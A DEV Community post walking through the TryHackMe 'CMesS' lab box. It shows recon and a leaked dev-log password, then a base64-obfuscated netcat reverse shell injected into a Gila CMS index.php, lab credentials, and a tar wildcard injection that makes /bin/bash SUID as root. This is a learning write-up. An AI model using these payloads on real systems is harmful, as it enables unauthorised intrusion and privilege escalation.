DEV Community

Laach_
Laach_

Posted on

CMesS - THM

Machine Info

Difficulty: Medium🟧
Link: HERE
Avg time: 75 Minutes
OS: Linux

Description: Can you root this Gila CMS box?

Recon

INFO: Before nmap we are told to add [IP] cmess.thm to /etc/hosts

Casually nmap scan

sudo nmap cmess.thm -Pn -sV -sC -p- -T4 -n -O -oN scan.txt
Enter fullscreen mode Exit fullscreen mode
Starting Nmap 7.99 ( https://nmap.org ) at 2026-06-15 13:54 +0200
Nmap scan report for cmess.thm (10.114.129.136)
Host is up (0.028s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 d9:b6:52:d3:93:9a:38:50:b4:23:3b:fd:21:0c:05:1f (RSA)
|   256 21:c3:6e:31:8b:85:22:8a:6d:72:86:8f:ae:64:66:2b (ECDSA)
|_  256 5b:b9:75:78:05:d7:ec:43:30:96:17:ff:c6:a8:6c:ed (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 3 disallowed entries 
|_/src/ /themes/ /lib/
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-generator: Gila CMS
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.99%E=4%D=6/15%OT=22%CT=1%CU=42629%PV=Y%DS=3%DC=I%G=Y%TM=6A2FE82
OS:5%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=1%ISR=10B%TI=Z%CI=I%II=I%TS=8)SEQ
OS:(SP=102%GCD=1%ISR=10F%TI=Z%CI=I%II=I%TS=8)SEQ(SP=103%GCD=1%ISR=10A%TI=Z%
OS:CI=I%II=I%TS=8)SEQ(SP=106%GCD=1%ISR=10B%TI=Z%CI=I%II=I%TS=8)SEQ(SP=FC%GC
OS:D=1%ISR=10D%TI=Z%CI=I%II=I%TS=8)OPS(O1=M4E8ST11NW7%O2=M4E8ST11NW7%O3=M4E
OS:8NNT11NW7%O4=M4E8ST11NW7%O5=M4E8ST11NW7%O6=M4E8ST11)WIN(W1=68DF%W2=68DF%
OS:W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN(R=Y%DF=Y%T=40%W=6903%O=M4E8NNSNW7%CC
OS:=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T
OS:=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=
OS:0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=
OS:Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=
OS:G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 3 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 46.60 seconds

Enter fullscreen mode Exit fullscreen mode

Scan reveals:

  • 22/tcp - SSH
  • 80/tcp - HTTP

HTTP got robots.txt with 3 entries:

  • src/
  • themes/
  • lib/

Shell as www-data

My first thought was to visit src/ it did redirect to something looking like potential LFI

LFI url

But no matter what I tried I couldn't retrieve /etc/passwd either RFI didn't worked too.

INFO: Other entries in robots.txt were the same I tested them but nothing

Later I tried running Feroxbuster there were some not usual files and directories

 sudo feroxbuster -u 'http://cmess.thm/' -r -C 404
Enter fullscreen mode Exit fullscreen mode
403      GET        9l       28w      274c http://cmess.thm/lib/?url=lib
403      GET        9l       28w      274c http://cmess.thm/src/?url=src
403      GET        9l       28w      274c http://cmess.thm/themes/?url=themes
200      GET      107l      290w     3851c http://cmess.thm/index
200      GET       44l      113w     1605c http://cmess.thm/src/core/assets/lazyImgLoad.js
200      GET       43l       98w     1360c http://cmess.thm/login/password_reset
200      GET      799l     1024w    15763c http://cmess.thm/lib/gila.min.css
200      GET        4l       66w    31000c http://cmess.thm/lib/font-awesome/css/font-awesome.min.css
200      GET       92l      266w     3353c http://cmess.thm/about
200      GET       68l      422w    25046c http://cmess.thm/assets/gila-logo.png
200      GET      107l      290w     3851c http://cmess.thm/search
200      GET      107l      290w     3851c http://cmess.thm/blog
200      GET       41l       99w     1580c http://cmess.thm/login
200      GET      109l      291w     3862c http://cmess.thm/category
200      GET      102l      308w     4078c http://cmess.thm/1/hello_world
200      GET      107l      290w     3865c http://cmess.thm/
200      GET      102l      308w     4078c http://cmess.thm/1
200      GET        1l        4w       68c http://cmess.thm/login/register
200      GET       21l       42w      735c http://cmess.thm/feed
200      GET      107l      290w     3851c http://cmess.thm/0
200      GET      101l      272w     3590c http://cmess.thm/author
200      GET      102l      308w     4078c http://cmess.thm/01
200      GET      109l      292w     3874c http://cmess.thm/tag
200      GET      107l      290w     3851c http://cmess.thm/Search
200      GET       92l      266w     3339c http://cmess.thm/About
200      GET      107l      290w     3851c http://cmess.thm/Index
200      GET        0l        0w        0c http://cmess.thm/api
200      GET        1l        4w       68c http://cmess.thm/login/Register
200      GET       14l       40w      563c http://cmess.thm/assets/?url=assets
500      GET        0l        0w        0c http://cmess.thm/cm
200      GET        0l        0w        0c http://cmess.thm/fm
200      GET      107l      290w     3851c http://cmess.thm/INDEX
200      GET        0l        0w        0c http://cmess.thm/login/callback
Enter fullscreen mode Exit fullscreen mode

There were some weird outputs but most of them were not found or main page. Only thing that caught my attention was possible IDOR.

http://cmess.thm/0
Enter fullscreen mode Exit fullscreen mode

It was returning home page with post that contained title and body of it. but

http://cmess.thm/1
Enter fullscreen mode Exit fullscreen mode

returned title, posted by and body but posted by was empty which was weird. I did tried other numbers such as 2, 3, 4 but they returned not found so it was a rabbit hole. Ferox also revealed path /login/register but it redirected to 404 — another rabbit hole. I also tried brute force on login/ with guessed email admin@cmess.thm but after 3 tries I got rate limited — another rabbit hole. This whole page seemed like a dead end so I tried subdomain enum with ffuf.

ffuf -u 'http://cmess.thm' -H "Host: FUZZ.cmess.thm" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -fw 522 -c
Enter fullscreen mode Exit fullscreen mode

This finally gave some serious lead

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://cmess.thm
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
 :: Header           : Host: FUZZ.cmess.thm
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response words: 522
________________________________________________

dev                     [Status: 200, Size: 934, Words: 191, Lines: 31, Duration: 4663ms]
:: Progress: [4989/4989] :: Job [1/1] :: 295 req/sec :: Duration: [0:00:17] :: Errors: 0 ::
Enter fullscreen mode Exit fullscreen mode

Adding dev.cmess.thm to /etc/hosts and visiting it revealed a black page with a Development Log containing credentials for andre@cmess.thm

## Development Log

### andre@cmess.thm

Have you guys fixed the bug that was found on live?

### support@cmess.thm

Hey Andre, We have managed to fix the misconfigured .htaccess file, we're hoping to patch it in the upcoming patch!

### support@cmess.thm

Update! We have had to delay the patch due to unforeseen circumstances

### andre@cmess.thm

That's ok, can you guys reset my password if you get a moment, I seem to be unable to get onto the admin panel.

### support@cmess.thm

Your password has been reset. Here: KPFTN_f2yxe%
Enter fullscreen mode Exit fullscreen mode

Credentials worked. There was a CMS dashboard with page editing functionality. In most CMS dashboards, if page editing is available, getting a shell is trivial. At /admin/fm there is a list of files and directories. Editing index.php can give a shell. Penelope was used as it handles and stabilizes the shell automatically.

INFO: In this file list there was an interesting file config.php containing root credentials for MySQL, maybe useful for later.

Code injected into index.php:

<?php system('printf KHJtIC90bXAvXztta2ZpZm8gL3RtcC9fO2NhdCAvdG1wL198c2ggMj4mMXxuYyAxOTIuMTY4LjEzMS45MSA0NDQ0ID4vdG1wL18pID4vZGV2L251bGwgMj4mMSAm|base64 -d|sh'); ?>
Enter fullscreen mode Exit fullscreen mode

After saving and visiting the main page, Penelope catches a shell as www-data.

Shell as Andre

Password reuse from the login page was attempted but didn't work. linpeas and pspy64 were transferred to the target. pspy64 revealed a cronjob running as root every 2 minutes but it wasn't investigated further at this point.

INFO: The cronjob wasn't investigated because write access to /home/andre was required.

linpeas kept crashing so manual enumeration was done. MySQL was checked using the credentials found earlier but nothing useful was found. Eventually /opt was checked — an obvious privesc path that was missed earlier due to linpeas issues. Inside was .password.bak with Andre's password.

www-data@cmess:/opt$ ls -al
total 12
drwxr-xr-x  2 root root 4096 Feb  6  2020 .
drwxr-xr-x 22 root root 4096 Feb  6  2020 ..
-rwxrwxrwx  1 root root   36 Feb  6  2020 .password.bak
www-data@cmess:/opt$ cat .password.bak
andres backup password
UQfsdCB7aAP6
Enter fullscreen mode Exit fullscreen mode

Flag located at: /home/andre/user.txt

Shell as Root

The root cronjob was performing a backup of every file in /home/andre/backup.

*/2 *   * * *   root    cd /home/andre/backup && tar -zcf /tmp/andre_backup.tar.gz *
Enter fullscreen mode Exit fullscreen mode

The * wildcard is the key. tar supports --checkpoint flags that execute commands at intervals. By creating files named --checkpoint=1 and --checkpoint-action=exec=[command] inside the backup directory, tar interprets them as its own flags instead of files.

INFO: Different explanation of tar wildcard injection HERE

A malicious shell.sh was created with the following payload:

#!/bin/bash

chmod +s /bin/bash
Enter fullscreen mode Exit fullscreen mode

Execute permission was added and checkpoint files were created:

chmod +x shell.sh 
echo "" > "--checkpoint=1" 
echo "" > "--checkpoint-action=exec=bash shell.sh"
Enter fullscreen mode Exit fullscreen mode

Final state of the backup directory:

andre@cmess:~/backup$ ls -al
total 24
drwxr-x--- 2 andre andre 4096 Jun 15 06:14 .
drwxr-x--- 5 andre andre 4096 Jun 15 06:12 ..
-rw-rw-r-- 1 andre andre    1 Jun 15 06:14 --checkpoint=1
-rw-rw-r-- 1 andre andre    1 Jun 15 06:14 --checkpoint-action=exec=bash shell.sh
-rwxr-x--- 1 andre andre   51 Feb  9  2020 note
-rwxrwxr-x 1 andre andre   32 Jun 15 06:12 shell.sh
Enter fullscreen mode Exit fullscreen mode

After the cronjob fired, shell.sh was executed as root and SUID was set on /bin/bash, allowing a root shell via bash -p

Flag located in /root/root.txt

Top comments (0)